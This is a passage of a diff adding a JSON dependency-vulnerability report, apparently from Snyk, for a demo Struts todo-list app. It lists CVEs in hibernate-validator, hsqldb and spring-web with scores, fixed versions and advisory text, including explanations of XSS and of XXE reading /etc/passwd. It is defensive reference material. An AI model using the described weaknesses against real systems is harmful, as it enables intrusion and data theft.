"CWE": [ + "CWE-592" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2016-12-25T16:51:53Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-07-17T16:51:53Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2014-07-17T16:51:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:45.778673Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "6.0.19.Final", + "6.1.3.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", + "className": "ValidatorImpl", + "functionName": "validate" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/pull/1071", + "title": "GitHub PR" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-1758", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:37.379564Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", + "epssDetails": { + "percentile": "0.49937", + "probability": "0.00139", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10693" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-rmrm-75hp-phr2" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-05T12:05:58.541980Z", + "functions_new": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.engine.ValidatorImpl", + "functionName": "validate" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-05-05T16:32:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.490090Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "6.0.18.Final", + "6.1.0.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", + "className": "SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", + "title": "GitHub Commit" + }, + { + "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", + "title": "Hibernator Security Release Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:47.749976Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", + "epssDetails": { + "percentile": "0.61710", + "probability": "0.00232", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-10219" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-14T16:07:06.897969Z", + "functions_new": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-10-18T14:55:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-01-09T14:55:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.455389Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.29.RELEASE", + "5.0.19.RELEASE", + "5.1.18.RELEASE", + "5.2.9.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.6, + "functions": [ + { + "version": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ], + "functionId": { + "filePath": "org/springframework/web/util/WebUtils.java", + "className": "WebUtils", + "functionName": "parseMatrixVariables" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://tanzu.vmware.com/security/cve-2015-5211", + "title": "CVE-2015-5211" + }, + { + "url": "https://pivotal.io/security/cve-2020-5421", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:33.950462Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:07.572789Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:04.397840Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:33.950462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:07.572789Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Improper Input Validation. The protections against Reflected File Download attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a `jsessionid` path parameter.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 4.3.29.RELEASE, 5.0.19.RELEASE, 5.1.18.RELEASE, 5.2.9.RELEASE or higher.\n## References\n- [CVE-2015-5211](https://tanzu.vmware.com/security/cve-2015-5211)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2020-5421)\n", + "epssDetails": { + "percentile": "0.95901", + "probability": "0.15300", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-5421" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2020-09-18T14:36:44.859594Z", + "functions_new": [ + { + "version": [ + "[3.2.0.RELEASE,4.3.29.RELEASE)", + "[5.0.0.RELEASE, 5.0.19.RELEASE)", + "[5.1.0.RELEASE, 5.1.18.RELEASE)", + "[5.2.0.RELEASE, 5.2.9.RELEASE)" + ], + "functionId": { + "className": "org.springframework.web.util.WebUtils", + "functionName": "parseMatrixVariables" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T14:23:55Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2020-09-18T16:17:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:07.572789Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@4.3.29.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE,3.2.9.RELEASE)", + "[4.0.0.RELEASE,4.0.5.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.9.RELEASE", + "4.0.5.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [ + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", + "className": "SourceHttpMessageConverter", + "functionName": "readDOMSource" + } + }, + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", + "className": "SourceHttpMessageConverter", + "functionName": "readSAXSource" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/16390", + "title": "GitHub Issue" + }, + { + "url": "http://www.gopivotal.com/security/cve-2014-0225", + "title": "Pivotal Security" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:48:48.781285Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:33.267561Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:48.781285Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. This is due to not disabling the resolution of URI references by default in a DTD declaration. This occurs only when processing user provided XML documents.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16390)\n- [Pivotal Security](http://www.gopivotal.com/security/cve-2014-0225)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225)\n", + "epssDetails": { + "percentile": "0.55630", + "probability": "0.00181", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-0225" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:52Z", + "functions_new": [ + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", + "functionName": "readDOMSource" + } + }, + { + "version": [ + "[3,3.2.8.RELEASE]", + "[4,4.0.4.RELEASE]" + ], + "functionId": { + "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", + "functionName": "readSAXSource" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-12-25T16:51:52Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:48.781285Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.9.RELEASE" 